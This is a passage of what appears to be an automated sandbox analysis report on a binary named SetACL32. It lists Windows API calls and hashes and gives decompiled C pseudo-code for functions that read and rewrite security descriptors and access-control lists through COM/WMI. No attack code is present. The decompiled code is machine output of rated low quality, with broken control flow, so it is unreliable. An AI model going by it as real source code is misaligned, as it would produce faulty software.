              • GetSecurityDescriptorLength.ADVAPI32(?), ref: 012C35A6
              • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 012C35BA
              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 012C35D6
              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 012C35F6
              • VariantInit.OLEAUT32(?), ref: 012C3600
              • VariantClear.OLEAUT32(?), ref: 012C3640
              • VariantClear.OLEAUT32(?), ref: 012C3679
              • SysFreeString.OLEAUT32(74F3D4FF), ref: 012C36E2
              • _com_issue_error.COMSUPP ref: 012C3767
              • _com_issue_error.COMSUPP ref: 012C3771
              • _com_issue_error.COMSUPP ref: 012C377B
              • _com_issue_error.COMSUPP ref: 012C3785
              • _com_issue_error.COMSUPP ref: 012C378F
              • _com_issue_error.COMSUPP ref: 012C3799
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: _com_issue_error$String$AllocArraySafeVariant$ClearDataDescriptorSecurity$AccessCreateFreeInitLengthUnaccessValid
              • String ID: Put failed, returned 0x%x$SetSD$\\.\$__systemsecurity$__systemsecurity=@
              • API String ID: 1425945781-386781740
              • Opcode ID: de51be48e8d26cfa9400aca8667cd29489dff6d7427c4027b0854415bc0c4d92
              • Instruction ID: d9bab11e23ed333a0c5924719c0550ffee8f6797ecdb3bde59c865cc3a1a16ee
              • Opcode Fuzzy Hash: de51be48e8d26cfa9400aca8667cd29489dff6d7427c4027b0854415bc0c4d92
              • Instruction Fuzzy Hash: E4B152B1910206EFEB20DFA8DC45B9EBBB8BF04B14F14865DE714EB280D7759904CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C37A0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 265memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 26%
              			E012C37A0(void* __ebx, signed int __ecx, signed int* __edx, signed int* __edi, void* __esi, intOrPtr _a16, signed int _a20) {
				char _v0;
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				char _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				signed int _v88;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v124;
				signed int _v136;
				signed int* _v140;
				signed int _v148;
				char _v152;
				signed int _t147;
				signed int _t157;
				signed int _t158;
				signed int _t166;
				signed int _t168;
				intOrPtr _t171;
				void* _t175;
				void* _t177;
				signed int _t179;
				signed int _t184;
				intOrPtr* _t185;
				signed int _t188;
				signed int* _t198;
				signed int* _t202;
				signed int _t209;
				signed int _t211;
				signed int _t215;
				signed int _t221;
				signed int _t224;
				signed int _t227;
				signed int _t228;
				signed int _t230;
				signed int _t231;
				signed int _t236;
				signed int _t237;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed int _t248;
				signed int _t250;
				void* _t251;
				signed int _t252;
				signed int _t254;
				char _t263;
				void* _t264;
				signed int* _t271;
				signed int* _t274;
				intOrPtr* _t277;
				signed int* _t280;
				signed int _t282;
				signed int _t284;
				intOrPtr* _t285;
				signed int _t287;
				void* _t288;
				signed int* _t290;
				signed int _t291;
				signed int _t292;
				void* _t293;
				signed int* _t296;
				signed int _t297;
				void* _t298;
				void* _t299;
				signed int _t300;
				signed int _t303;
				signed int _t304;
				signed int _t307;
				signed int _t309;
				void* _t312;
				void* _t317;

				_t290 = __edi;
				_t280 = __edx;
				_t254 = __ecx;
				_t303 = _t307;
				_push(0xffffffff);
				_push(0x12ec6d2);
				_push( *[fs:0x0]);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t147 =  *0x1309018; // 0xedd8d3b4
				 *[fs:0x0] =  &_v16;
				_v48 = __edx;
				_v36 = __ecx;
				_t296 = E012CAE5D(__ebx, __edi, __esi, _t317, 0xc, _t147 ^ _t303);
				_t309 = _t307 - 0x38 + 4;
				_v32 = _t296;
				_v8 = 0;
				_t248 = __imp__#2;
				if(_t296 == 0) {
					_t296 = 0;
					__eflags = 0;
					L4:
					_v8 = 0xffffffff;
					_v32 = _t296;
					_t320 = _t296;
					if(_t296 == 0) {
						goto L48;
					} else {
						_push(0xc);
						_v8 = 1;
						_t290 = E012CAE5D(_t248, _t290, _t296, _t320);
						_t309 = _t309 + 4;
						_v24 = _t290;
						_v8 = 2;
						if(_t290 == 0) {
							_t290 = 0;
							__eflags = 0;
							L9:
							_v8 = 1;
							_v56 = _t290;
							if(_t290 == 0) {
								goto L50;
							} else {
								_t280 =  &_v28;
								_v8 = 3;
								_t254 = _v36;
								_v28 = 0;
								_t209 =  *((intOrPtr*)( *_t254 + 0x60))(_t254,  *_t296,  *_t290, 0, 0, 0, _t280, 0);
								_v24 = _t209;
								if(_t209 < 0) {
									L33:
									_t252 = _v24;
									goto L34;
								} else {
									if(_v28 != 0) {
										_push(0xc);
										_t224 = E012CAE5D(_t248, _t290, _t296, __eflags);
										_t248 = _t224;
										_t309 = _t309 + 4;
										_v36 = _t248;
										_v8 = 4;
										__eflags = _t248;
										if(_t248 == 0) {
											_t248 = 0;
											__eflags = 0;
											goto L17;
										} else {
											 *(_t248 + 4) = 0;
											 *(_t248 + 8) = 1;
											__imp__#2(L"sd");
											 *_t248 = _t224;
											__eflags = _t224;
											if(__eflags == 0) {
												goto L51;
											} else {
												L17:
												_v8 = 3;
												_v36 = _t248;
												__eflags = _t248;
												if(__eflags == 0) {
													goto L52;
												} else {
													__imp__#8( &_v72);
													_v8 = 6;
													_t277 = _v28;
													_t227 =  *((intOrPtr*)( *_t277 + 0x10))(_t277,  *_t248, 0,  &_v72, 0, 0);
													_v24 = _t227;
													__eflags = _t227;
													if(_t227 >= 0) {
														__eflags = _v72 - 0x2011;
														if(_v72 == 0x2011) {
															_t236 = _v64;
															_v32 = _t236;
															__imp__#20(_t236, 1,  &_v44);
															_v24 = _t236;
															__eflags = _t236;
															if(_t236 >= 0) {
																_t237 =  &_v40;
																__imp__#19(_v32, 1, _t237);
																_v24 = _t237;
																__eflags = _t237;
																if(_t237 >= 0) {
																	_v36 = _v40 - _v44 + 1;
																	_t241 =  &_v52;
																	__imp__#23(_v32, _t241);
																	_v24 = _t241;
																	__eflags = _t241;
																	if(_t241 >= 0) {
																		_push(_v36);
																		_t242 = E012D4011();
																		_t309 = _t309 + 4;
																		 *_v48 = _t242;
																		__eflags = _t242;
																		if(_t242 != 0) {
																			E012CC800(_t242, _v52, _v36);
																			_t309 = _t309 + 0xc;
																			__imp__#24(_v32);
																			_v24 = 0;
																		} else {
																			_v24 = 8;
																		}
																	}
																}
															}
														} else {
															_v24 = 0xd;
														}
													}
													_t228 =  &_v72;
													__imp__#9(_t228);
													asm("lock xadd [ebx+0x8], eax");
													_t209 = (_t228 | 0xffffffff) - 1;
													__eflags = _t209;
													if(_t209 == 0) {
														_t230 =  *_t248;
														__eflags = _t230;
														if(_t230 != 0) {
															 *__imp__#6(_t230);
															 *_t248 = 0;
														}
														_t231 =  *(_t248 + 4);
														__eflags = _t231;
														if(_t231 != 0) {
															E012CAE58(_t231);
															_t309 = _t309 + 4;
															 *(_t248 + 4) = 0;
														}
														_push(0xc);
														_t209 = E012CAE27(_t248);
														_t309 = _t309 + 8;
													}
													goto L33;
												}
											}
										}
									} else {
										_t252 = 0x65b;
										L34:
										asm("lock xadd [edi+0x8], eax");
										_t211 = (_t209 | 0xffffffff) - 1;
										if(_t211 == 0) {
											_t221 =  *_t290;
											if(_t221 != 0) {
												__imp__#6(_t221);
												 *_t290 = 0;
											}
											_t222 = _t290[1];
											if(_t290[1] != 0) {
												E012CAE58(_t222);
												_t309 = _t309 + 4;
												_t290[1] = 0;
											}
											_push(0xc);
											_t211 = E012CAE27(_t290);
											_t309 = _t309 + 8;
										}
										asm("lock xadd [esi+0x8], eax");
										if((_t211 | 0xffffffff) == 1) {
											_t215 =  *_t296;
											if(_t215 != 0) {
												 *__imp__#6(_t215);
												 *_t296 = 0;
											}
											_t216 = _t296[1];
											if(_t296[1] != 0) {
												E012CAE58(_t216);
												_t309 = _t309 + 4;
												_t296[1] = 0;
											}
											_push(0xc);
											E012CAE27(_t296);
										}
										 *[fs:0x0] = _v16;
										return _t252;
									}
								}
							}
						} else {
							_t290[1] = 0;
							_t290[2] = 1;
							_t244 =  *_t248(L"GetSD");
							 *_t290 = _t244;
							if(_t244 == 0) {
								goto L49;
							} else {
								goto L9;
							}
						}
					}
				} else {
					_t296[1] = 0;
					_t296[2] = 1;
					_t245 =  *_t248(L"__systemsecurity=@");
					 *_t296 = _t245;
					if(_t245 == 0) {
						E012CBEA0(0x8007000e);
						L48:
						E012CBEA0(0x8007000e);
						L49:
						E012CBEA0(0x8007000e);
						L50:
						E012CBEA0(0x8007000e);
						L51:
						E012CBEA0(0x8007000e);
						L52:
						E012CBEA0(0x8007000e);
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t303);
						_t304 = _t309;
						_push(0xffffffff);
						_push(0x12ec70d);
						_push( *[fs:0x0]);
						_t157 =  *0x1309018; // 0xedd8d3b4
						_t158 = _t157 ^ _t304;
						_v100 = _t158;
						_push(_t248);
						_push(_t296);
						_push(_t290);
						_push(_t158);
						 *[fs:0x0] =  &_v96;
						_v140 = _t280;
						_v136 = _t254;
						_v88 = 0;
						_push(1);
						_v88 = 1;
						_t297 = E012C9DCB(0, _t290, _t296, __eflags);
						_v148 = _t297;
						_v88 = 2;
						_v124 = 0;
						__eflags = _v60 - 2;
						_v124 = 0;
						_t256 =  <  ? _v60 : 2;
						__eflags = _v56 - 8;
						_t163 =  >=  ? _v76 :  &_v76;
						_v108 = 0;
						_v104 = 7;
						E012A1EE0(0,  &_v124, _t280, _t290, _t297,  >=  ? _v76 :  &_v76,  <  ? _v60 : 2);
						_v88 = 3;
						_push( &_v152);
						_t166 = E01298900( &_v124, L"\\\\");
						_t312 = _t309 - 0x44 + 8;
						_v88 = 2;
						_t282 = _v104;
						__eflags = _t166;
						_t250 = 0 | _t166 == 0x00000000;
						__eflags = _t282 - 8;
						if(_t282 < 8) {
							L57:
							_t167 = 0;
							_v32 = 0;
							_v28 = 7;
							_v48 = 0;
							_v12 = 0;
							__eflags = _t297;
							if(_t297 != 0) {
								_t167 =  *((intOrPtr*)( *_t297 + 8))();
								__eflags = 0;
								if(0 != 0) {
									_t283 =  *0x00000000;
									_push(1);
									_t167 =  *( *0x00000000)();
								}
							}
							__eflags = _t250;
							if(_t250 == 0) {
								L66:
								_v56 = 0;
								_v52 = 0;
								__imp__CoInitialize(0);
								_t291 = _t167;
								__eflags = _t291;
								if(_t291 >= 0) {
									L69:
									__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 2, 0);
									_t292 = _t167;
									__eflags = _t292;
									if(_t292 >= 0) {
										L71:
										_t168 =  &_v56;
										__imp__CoCreateInstance(0x12ef698, 0, 1, 0x12ef6a8, _t168);
										_t292 = _t168;
										__eflags = _t292;
										if(_t292 >= 0) {
											__eflags = _a20 - 8;
											_t177 =  >=  ? _v0 :  &_v0;
											__imp__#4(_t177, _a16);
											_t284 = _v56;
											_t299 = _t177;
											_t264 =  *_t284;
											_t179 =  *((intOrPtr*)(_t264 + 0xc))(_t284, _t299, 0, 0, 0, 0, 0, 0,  &_v52);
											_t292 = _t179;
											__imp__#6(_t299);
											__eflags = _t292;
											if(_t292 >= 0) {
												_t300 = _v52;
												_t184 =  &_v72;
												__imp__CoQueryProxyBlanket(_t300, _t184,  &_v88, 0,  &_v68,  &_v84, 0,  &_v80);
												_t292 = _t184;
												__eflags = _t292;
												if(_t292 < 0) {
													L75:
													_t185 = _v52;
													 *((intOrPtr*)( *_t185 + 8))(_t185);
												} else {
													__imp__CoSetProxyBlanket(_t300, 0xffffffff, 0xffffffff, 0xffffffff, _v68, 3, 0xffffffff, 0x800);
													_t292 = _t184;
													__eflags = _t292;
													if(_t292 >= 0) {
														__eflags = _v64;
														_t285 = _v60;
														if(_v64 != 0) {
															E012C33E0(_t250, _v52,  *_t285, _t292, _t300);
															goto L80;
														} else {
															_push(_t264);
															_t292 = E012C37A0(_t250, _v52, _t285, _t292, _t300);
															_t312 = _t312 + 4;
															__eflags = _t292;
															if(_t292 == 0) {
																L80:
																_t188 = _v52;
																 *((intOrPtr*)( *_t188 + 8))(_t188);
																__eflags = _t250;
																if(_t250 == 0) {
																	__imp__CoUninitialize();
																}
																_t292 = 0;
																__eflags = 0;
															} else {
															}
														}
													} else {
														goto L75;
													}
												}
											}
										}
									} else {
										__eflags = _t292 - 0x80010119;
										if(_t292 == 0x80010119) {
											goto L71;
										}
									}
								} else {
									__eflags = _t291 - 0x80010106;
									if(_t291 == 0x80010106) {
										_t250 = 1;
										goto L69;
									}
								}
								_t283 = _a20;
								__eflags = _t283 - 8;
								if(_t283 < 8) {
									L87:
									 *[fs:0x0] = _v20;
									_pop(_t293);
									_pop(_t298);
									_pop(_t251);
									__eflags = _v24 ^ _t304;
									return E012CAE19(_t292, _t251, _v24 ^ _t304, _t283, _t293, _t298);
								} else {
									_t263 = _v0;
									_t283 = 2 + _t283 * 2;
									_t171 = _t263;
									__eflags = _t283 - 0x1000;
									if(_t283 < 0x1000) {
										L86:
										_push(_t283);
										E012CAE27(_t263);
										goto L87;
									} else {
										_t143 = _t263 - 4; // 0x2e33
										_t263 =  *_t143;
										_t283 = _t283 + 0x23;
										__eflags = _t171 - _t263 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L90;
										} else {
											goto L86;
										}
									}
								}
							} else {
								_t263 = _a16;
								__eflags = 0x7ffffffe - _t263 - 4;
								if(__eflags < 0) {
									goto L89;
								} else {
									__eflags = _a20 - 8;
									_t195 =  >=  ? _v0 :  &_v0;
									E01299780( &_v48, _v64, _t263, L"\\\\.\\", 4,  >=  ? _v0 :  &_v0, _t263);
									_t167 = E012982B0(_t250,  &_v0,  &_v48);
									_t287 = _v28;
									__eflags = _t287 - 8;
									if(_t287 < 8) {
										goto L66;
									} else {
										_t271 = _v48;
										_t288 = 2 + _t287 * 2;
										_t198 = _t271;
										__eflags = _t288 - 0x1000;
										if(_t288 < 0x1000) {
											L65:
											_push(_t288);
											_t167 = E012CAE27(_t271);
											_t312 = _t312 + 8;
											goto L66;
										} else {
											_t263 =  *((intOrPtr*)(_t271 - 4));
											_t283 = _t288 + 0x23;
											__eflags = _t198 - _t263 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L90;
											} else {
												goto L65;
											}
										}
									}
								}
							}
						} else {
							_t274 = _v48;
							_t283 = 2 + _t282 * 2;
							_t202 = _t274;
							__eflags = _t283 - 0x1000;
							if(_t283 < 0x1000) {
								L56:
								_push(_t283);
								E012CAE27(_t274);
								_t312 = _t312 + 8;
								goto L57;
							} else {
								_t263 =  *((intOrPtr*)(_t274 - 4));
								_t283 = _t283 + 0x23;
								__eflags = _t202 - _t263 + 0xfffffffc - 0x1f;
								if(__eflags > 0) {
									E012CF35F(_t250, _t263, _t283, __eflags);
									L89:
									E012A1D70(_t263);
									L90:
									_t175 = E012CF35F(_t250, _t263, _t283, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									__imp__#9(_t263);
									return _t175;
								} else {
									goto L56;
								}
							}
						}
					} else {
						goto L4;
					}
				}
			}






























































































              0x012c37a0
              0x012c37a0
              0x012c37a0
              0x012c37a1
              0x012c37a3
              0x012c37a5
              0x012c37b0
              0x012c37b4
              0x012c37b5
              0x012c37b6
              0x012c37b7
              0x012c37c2
              0x012c37c8
              0x012c37cb
              0x012c37d5
              0x012c37d7
              0x012c37da
              0x012c37dd
              0x012c37e4
              0x012c37ec
              0x012c380f
              0x012c380f
              0x012c3811
              0x012c3811
              0x012c3818
              0x012c381b
              0x012c381d
              0x00000000
              0x012c3823
              0x012c3823
              0x012c3825
              0x012c3831
              0x012c3833
              0x012c3836
              0x012c3839
              0x012c383f
              0x012c3862
              0x012c3862
              0x012c3864
              0x012c3864
              0x012c3868
              0x012c386d
              0x00000000
              0x012c3873
              0x012c3875
              0x012c3878
              0x012c387c
              0x012c3888
              0x012c3894
              0x012c3897
              0x012c389c
              0x012c3a19
              0x012c3a19
              0x00000000
              0x012c38a2
              0x012c38a6
              0x012c38b2
              0x012c38b4
              0x012c38b9
              0x012c38bb
              0x012c38be
              0x012c38c1
              0x012c38c5
              0x012c38c7
              0x012c38ee
              0x012c38ee
              0x00000000
              0x012c38c9
              0x012c38ce
              0x012c38d5
              0x012c38dc
              0x012c38e2
              0x012c38e4
              0x012c38e6
              0x00000000
              0x012c38ec
              0x012c38f0
              0x012c38f0
              0x012c38f4
              0x012c38f7
              0x012c38f9
              0x00000000
              0x012c38ff
              0x012c3903
              0x012c390d
              0x012c3914
              0x012c391f
              0x012c3922
              0x012c3925
              0x012c3927
              0x012c3932
              0x012c3936
              0x012c3944
              0x012c394e
              0x012c3951
              0x012c3957
              0x012c395a
              0x012c395c
              0x012c395e
              0x012c3967
              0x012c396d
              0x012c3970
              0x012c3972
              0x012c397b
              0x012c397e
              0x012c3985
              0x012c398b
              0x012c398e
              0x012c3990
              0x012c3992
              0x012c3995
              0x012c399d
              0x012c39a0
              0x012c39a2
              0x012c39a4
              0x012c39b6
              0x012c39bb
              0x012c39c1
              0x012c39c7
              0x012c39a6
              0x012c39a6
              0x012c39a6
              0x012c39a4
              0x012c3990
              0x012c3972
              0x012c3938
              0x012c3938
              0x012c3938
              0x012c3936
              0x012c39ce
              0x012c39d2
              0x012c39db
              0x012c39e0
              0x012c39e0
              0x012c39e1
              0x012c39e3
              0x012c39e5
              0x012c39e7
              0x012c39ef
              0x012c39f1
              0x012c39f1
              0x012c39f7
              0x012c39fa
              0x012c39fc
              0x012c39ff
              0x012c3a04
              0x012c3a07
              0x012c3a07
              0x012c3a0e
              0x012c3a11
              0x012c3a16
              0x012c3a16
              0x00000000
              0x012c39e1
              0x012c38f9
              0x012c38e6
              0x012c38a8
              0x012c38a8
              0x012c3a1c
              0x012c3a1f
              0x012c3a24
              0x012c3a25
              0x012c3a27
              0x012c3a2b
              0x012c3a2e
              0x012c3a34
              0x012c3a34
              0x012c3a3a
              0x012c3a3f
              0x012c3a42
              0x012c3a47
              0x012c3a4a
              0x012c3a4a
              0x012c3a51
              0x012c3a54
              0x012c3a59
              0x012c3a59
              0x012c3a5f
              0x012c3a65
              0x012c3a67
              0x012c3a6b
              0x012c3a73
              0x012c3a75
              0x012c3a75
              0x012c3a7b
              0x012c3a80
              0x012c3a83
              0x012c3a88
              0x012c3a8b
              0x012c3a8b
              0x012c3a92
              0x012c3a95
              0x012c3a9a
              0x012c3aa2
              0x012c3ab0
              0x012c3ab0
              0x012c38a6
              0x012c389c
              0x012c3841
              0x012c3846
              0x012c384d
              0x012c3854
              0x012c3856
              0x012c385a
              0x00000000
              0x012c3860
              0x00000000
              0x012c3860
              0x012c385a
              0x012c383f
              0x012c37ee
              0x012c37f3
              0x012c37fa
              0x012c3801
              0x012c3803
              0x012c3807
              0x012c3ab6
              0x012c3abb
              0x012c3ac0
              0x012c3ac5
              0x012c3aca
              0x012c3acf
              0x012c3ad4
              0x012c3ad9
              0x012c3ade
              0x012c3ae3
              0x012c3ae8
              0x012c3aed
              0x012c3aee
              0x012c3aef
              0x012c3af0
              0x012c3af1
              0x012c3af3
              0x012c3af5
              0x012c3b00
              0x012c3b04
              0x012c3b09
              0x012c3b0b
              0x012c3b0e
              0x012c3b0f
              0x012c3b10
              0x012c3b11
              0x012c3b15
              0x012c3b1b
              0x012c3b1e
              0x012c3b21
              0x012c3b2a
              0x012c3b2c
              0x012c3b35
              0x012c3b3a
              0x012c3b3d
              0x012c3b48
              0x012c3b4f
              0x012c3b52
              0x012c3b59
              0x012c3b5d
              0x012c3b62
              0x012c3b6a
              0x012c3b71
              0x012c3b78
              0x012c3b80
              0x012c3b84
              0x012c3b8d
              0x012c3b92
              0x012c3b95
              0x012c3b99
              0x012c3b9c
              0x012c3b9e
              0x012c3ba1
              0x012c3ba4
              0x012c3bd8
              0x012c3bd8
              0x012c3bda
              0x012c3be1
              0x012c3be8
              0x012c3bec
              0x012c3bef
              0x012c3bf1
              0x012c3bf7
              0x012c3bfa
              0x012c3bfc
              0x012c3bfe
              0x012c3c02
              0x012c3c04
              0x012c3c04
              0x012c3bfc
              0x012c3c06
              0x012c3c08
              0x012c3c83
              0x012c3c85
              0x012c3c8c
              0x012c3c93
              0x012c3c99
              0x012c3c9b
              0x012c3c9d
              0x012c3cad
              0x012c3cbf
              0x012c3cc5
              0x012c3cc7
              0x012c3cc9
              0x012c3cd7
              0x012c3cd7
              0x012c3ce9
              0x012c3cef
              0x012c3cf1
              0x012c3cf3
              0x012c3cf9
              0x012c3d03
              0x012c3d08
              0x012c3d0e
              0x012c3d11
              0x012c3d19
              0x012c3d27
              0x012c3d2b
              0x012c3d2d
              0x012c3d33
              0x012c3d35
              0x012c3d3b
              0x012c3d52
              0x012c3d57
              0x012c3d5d
              0x012c3d5f
              0x012c3d61
              0x012c3d82
              0x012c3d82
              0x012c3d88
              0x012c3d63
              0x012c3d76
              0x012c3d7c
              0x012c3d7e
              0x012c3d80
              0x012c3d8d
              0x012c3d91
              0x012c3d94
              0x012c3daf
              0x00000000
              0x012c3d96
              0x012c3d96
              0x012c3d9f
              0x012c3da1
              0x012c3da4
              0x012c3da6
              0x012c3db4
              0x012c3db4
              0x012c3dba
              0x012c3dbd
              0x012c3dbf
              0x012c3dc1
              0x012c3dc1
              0x012c3dc7
              0x012c3dc7
              0x00000000
              0x012c3da8
              0x012c3da6
              0x00000000
              0x00000000
              0x00000000
              0x012c3d80
              0x012c3d61
              0x012c3d35
              0x012c3ccb
              0x012c3ccb
              0x012c3cd1
              0x00000000
              0x00000000
              0x012c3cd1
              0x012c3c9f
              0x012c3c9f
              0x012c3ca5
              0x012c3cab
              0x00000000
              0x012c3cab
              0x012c3ca5
              0x012c3dc9
              0x012c3dcc
              0x012c3dcf
              0x012c3dff
              0x012c3e04
              0x012c3e0c
              0x012c3e0d
              0x012c3e0e
              0x012c3e12
              0x012c3e1c
              0x012c3dd1
              0x012c3dd1
              0x012c3dd4
              0x012c3ddb
              0x012c3ddd
              0x012c3de3
              0x012c3df5
              0x012c3df5
              0x012c3df7
              0x00000000
              0x012c3de5
              0x012c3de5
              0x012c3de5
              0x012c3de8
              0x012c3df0
              0x012c3df3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c3df3
              0x012c3de3
              0x012c3c0a
              0x012c3c0a
              0x012c3c14
              0x012c3c17
              0x00000000
              0x012c3c1d
              0x012c3c1d
              0x012c3c25
              0x012c3c38
              0x012c3c44
              0x012c3c49
              0x012c3c4c
              0x012c3c4f
              0x00000000
              0x012c3c51
              0x012c3c51
              0x012c3c54
              0x012c3c5b
              0x012c3c5d
              0x012c3c63
              0x012c3c79
              0x012c3c79
              0x012c3c7b
              0x012c3c80
              0x00000000
              0x012c3c65
              0x012c3c65
              0x012c3c68
              0x012c3c70
              0x012c3c73
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c3c73
              0x012c3c63
              0x012c3c4f
              0x012c3c17
              0x012c3ba6
              0x012c3ba6
              0x012c3ba9
              0x012c3bb0
              0x012c3bb2
              0x012c3bb8
              0x012c3bce
              0x012c3bce
              0x012c3bd0
              0x012c3bd5
              0x00000000
              0x012c3bba
              0x012c3bba
              0x012c3bbd
              0x012c3bc5
              0x012c3bc8
              0x012c3e1d
              0x012c3e22
              0x012c3e22
              0x012c3e27
              0x012c3e27
              0x012c3e2c
              0x012c3e2d
              0x012c3e2e
              0x012c3e2f
              0x012c3e31
              0x012c3e37
              0x00000000
              0x00000000
              0x00000000
              0x012c3bc8
              0x012c3bb8
              0x012c380d
              0x00000000
              0x012c380d
              0x012c3807

              APIs
              • SysAllocString.OLEAUT32(__systemsecurity=@), ref: 012C3801
              • SysAllocString.OLEAUT32(GetSD), ref: 012C3854
              • SysAllocString.OLEAUT32(012FFF98), ref: 012C38DC
              • VariantInit.OLEAUT32(?), ref: 012C3903
              • SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 012C3951
              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 012C3967
              • SafeArrayAccessData.OLEAUT32(?,?), ref: 012C3985
              • SafeArrayUnaccessData.OLEAUT32(?), ref: 012C39C1
              • VariantClear.OLEAUT32(?), ref: 012C39D2
              • SysFreeString.OLEAUT32(-00000001), ref: 012C3A2E
              • _com_issue_error.COMSUPP ref: 012C3AB6
              • _com_issue_error.COMSUPP ref: 012C3AC0
              • _com_issue_error.COMSUPP ref: 012C3ACA
              • _com_issue_error.COMSUPP ref: 012C3AD4
              • _com_issue_error.COMSUPP ref: 012C3ADE
              • _com_issue_error.COMSUPP ref: 012C3AE8
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: _com_issue_error$ArraySafeString$Alloc$BoundDataVariant$AccessClearFreeInitUnaccess
              • String ID: GetSD$__systemsecurity=@
              • API String ID: 1002945065-3672729512
              • Opcode ID: 55d46005ee04e84c7f2cd5a99c1c05405ee37f34e93eea5b3250ba0e2a439b8a
              • Instruction ID: 10b10fac11165abfcda38879e4a7a8943c3a47955cb9d8645aa7061e1bf2418e
              • Opcode Fuzzy Hash: 55d46005ee04e84c7f2cd5a99c1c05405ee37f34e93eea5b3250ba0e2a439b8a
              • Instruction Fuzzy Hash: 05A15FB091020ADBEB10DFA9D945BAEBBF8BF04B04F10862DE714AB280D775D514CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C3120 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 187COMMON
              Download Yara Rule
              C-Code - Quality: 64%
              			E012C3120(void* __ecx, void* __edx, long _a4, long _a8, void* _a12) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				void _v20;
				char _v21;
				char _v22;
				char _v23;
				void* _v28;
				long _v32;
				void* _v36;
				intOrPtr _v40;
				struct _ACL* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t63;
				intOrPtr* _t74;
				signed short _t87;
				long _t97;
				void* _t111;
				void* _t113;
				void* _t114;
				struct _ACL* _t116;
				void* _t117;
				long _t118;
				signed int _t119;
				void* _t120;

				_t111 = __edx;
				_t55 =  *0x1309018; // 0xedd8d3b4
				_v8 = _t55 ^ _t119;
				_t97 = _a4;
				asm("xorps xmm0, xmm0");
				_v44 = _t97;
				asm("movq [ebp-0x10], xmm0");
				_v12 = 0;
				_v36 = 0;
				_v28 = 0;
				_t113 = __ecx;
				if(_t97 == 0 || IsValidAcl(_t97) == 0) {
					L27:
					_t116 = 0;
				} else {
					_t118 = _a8;
					if(GetAce(_t97, _t118,  &_v36) != 0) {
						_t63 = _v36;
						_v22 =  *_t63;
						_v23 =  *((intOrPtr*)(_t63 + 1));
						_v40 =  *((intOrPtr*)(_t63 + 4));
						if(DeleteAce(_t97, _t118) != 0) {
							if(GetAclInformation(_t97,  &_v20, 0xc, 2) != 0) {
								_t97 = _v16 + 8 + GetLengthSid(_a12);
								_push(_t97);
								_t116 = E012D4011();
								_t120 = _t120 + 4;
								if(_t116 != 0) {
									if(InitializeAcl(_t116, _t97, 2) == 0) {
										L24:
										 *((intOrPtr*)(_t113 + 0x10)) = GetLastError();
										E012D3434(_t116);
										_t120 = _t120 + 4;
										goto L27;
									} else {
										_t97 = 0;
										_v21 = 0;
										_t74 = AddAccessAllowedAce;
										_v32 = 0;
										if(_v20 <= 0) {
											L22:
											_push(_a12);
											_push(_v40);
											_push(2);
											_push(_t116);
											if( *_t74() == 0 || GetAce(_t116, _t97 & 0x0000ffff,  &_v28) == 0) {
												goto L24;
											} else {
												 *_v28 = _v22;
												 *((char*)(_v28 + 1)) = _v23;
												goto L26;
											}
										} else {
											L12:
											while(1) {
												if(_t97 != _a8) {
													L16:
													if(GetAce(_v44, _t97,  &_v28) == 0 || AddAce(_t116, 2, 0xffffffff, _v28,  *(_v28 + 2) & 0x0000ffff) == 0) {
														goto L24;
													} else {
														_t87 = _v32 + 1;
														_t97 = _t87 & 0x0000ffff;
														_v32 = _t87;
														if(_t97 >= _v20) {
															if(_v21 != 0) {
																L26:
																if(IsValidAcl(_t116) == 0) {
																	goto L27;
																}
															} else {
																_t97 = _v32;
																_t74 = AddAccessAllowedAce;
																goto L22;
															}
														} else {
